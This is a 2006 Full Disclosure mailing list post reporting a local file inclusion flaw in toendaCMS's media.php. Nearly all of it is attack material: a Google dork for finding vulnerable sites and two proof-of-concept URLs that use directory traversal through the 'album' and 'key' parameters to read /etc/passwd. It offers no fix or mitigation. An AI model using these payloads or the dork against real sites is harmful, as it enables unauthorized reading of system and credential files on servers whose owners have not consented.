Full Disclosure mailing list archives

(no subject)

From: "MoHaJaLi" <mohajali2k4 () gmail com>
Date: Sat, 23 Sep 2006 13:45:58 -0700


Local File Include in  toendaCMS.

Vulnerable File : media.php

googleDork: "Powered by  toendaCMS "

PoC:
 

http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd

 or 

http://site.com/ media.php?album=../../../../../../../../../../../../..&key=/etc/passwd

_____

Found By MoHaJaLi

Greetz to Eddy_BAck0o

_____


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

(no subject) nicholas cann (Sep 10)
- <Possible follow-ups>
- (no subject) MoHaJaLi (Sep 23)
- (no subject) Andrew A (Sep 26)